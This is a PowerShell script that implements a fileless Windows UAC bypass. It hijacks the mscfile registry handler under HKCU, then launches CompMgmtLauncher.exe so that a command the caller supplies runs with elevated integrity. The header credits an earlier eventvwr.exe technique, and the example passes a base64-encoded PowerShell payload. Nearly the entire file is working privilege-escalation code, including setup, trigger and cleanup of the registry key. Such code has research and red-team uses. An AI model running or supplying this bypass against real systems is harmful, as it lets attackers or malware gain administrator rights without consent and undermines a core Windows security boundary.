└── Invoke-CompMgmtLauncherBypass.ps1 /Invoke-CompMgmtLauncherBypass.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-CompMgmtLauncherBypass { 2 | <# 3 | .SYNOPSIS 4 | 5 | Uses CompMgmtLauncher.exe to bypass UAC by performing an image hijack on the .msc file extension 6 | Tested on Windows 7, Windows 8.1, and Windows 10 7 | 8 | This is an identical issue to the eventvwr.exe bypass found by Matt Nelson, but in CompMgmtLauncher.exe. 9 | Credit goes to Matt Nelson (@enigma0x3) for the original vuln and writeup: 10 | https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ 11 | 12 | Slight modification to target CompMgmtLauncher.exe: mrfuzzy 13 | Original Author: Matt Nelson (@enigma0x3) 14 | License: BSD 3-Clause 15 | Required Dependencies: None 16 | Optional Dependencies: None 17 | 18 | .PARAMETER Command 19 | 20 | Specifies the command you want to run in a high-integrity context. For example, you can pass it powershell.exe followed by any encoded command "powershell -enc " 21 | 22 | .EXAMPLE 23 | 24 | Invoke-CompMgmtLauncherBypass -Command "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc IgBJAHMAIABFAGwAZQB2AGEAdABlAGQAOgAgACQAKAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA=" 25 | 26 | This will write out "Is Elevated: True" to C:\UACBypassTest. 27 | 28 | #> 29 | 30 | [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')] 31 | Param ( 32 | [Parameter(Mandatory = $True)] 33 | [ValidateNotNullOrEmpty()] 34 | [String] 35 | $Command, 36 | 37 | [Switch] 38 | $Force 39 | ) 40 | 41 | $mscCommandPath = "HKCU:\Software\Classes\mscfile\shell\open\command" 42 | #Add in the new registry entries to hijack the msc file 43 | if ($Force -or ((Get-ItemProperty -Path $mscCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){ 44 | New-Item $mscCommandPath -Force | 45 | New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null 46 | }else{ 47 | Write-Verbose "Key already exists, consider using -Force" 48 | exit 49 | } 50 | 51 | if (Test-Path $mscCommandPath) { 52 | Write-Verbose "Created registry entries to hijack the msc extension" 53 | }else{ 54 | Write-Warning "Failed to create registry key, exiting" 55 | exit 56 | } 57 | 58 | 59 | $CompMgmtLauncherPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'CompMgmtLauncher.exe' 60 | 61 | #Start Event Viewer 62 | if ($PSCmdlet.ShouldProcess($CompMgmtLauncherPath, 'Start process')) { 63 | $Process = Start-Process -FilePath $CompMgmtLauncherPath -PassThru 64 | Write-Verbose "Started CompMgmtLauncher.exe" 65 | } 66 | 67 | #Sleep 5 seconds 68 | Write-Verbose "Sleeping 5 seconds to trigger payload" 69 | if (-not $PSBoundParameters['WhatIf']) { 70 | Start-Sleep -Seconds 5 71 | } 72 | 73 | $mscfilePath = "HKCU:\Software\Classes\mscfile" 74 | 75 | if (Test-Path $mscfilePath) { 76 | #Remove the registry entry 77 | Remove-Item $mscfilePath -Recurse -Force 78 | Write-Verbose "Removed registry entries" 79 | } 80 | 81 | if(Get-Process -Id $Process.Id -ErrorAction SilentlyContinue){ 82 | Stop-Process -Id $Process.Id 83 | Write-Verboe "Killed running CompMgmtLauncher process" 84 | } 85 | } 86 | --------------------------------------------------------------------------------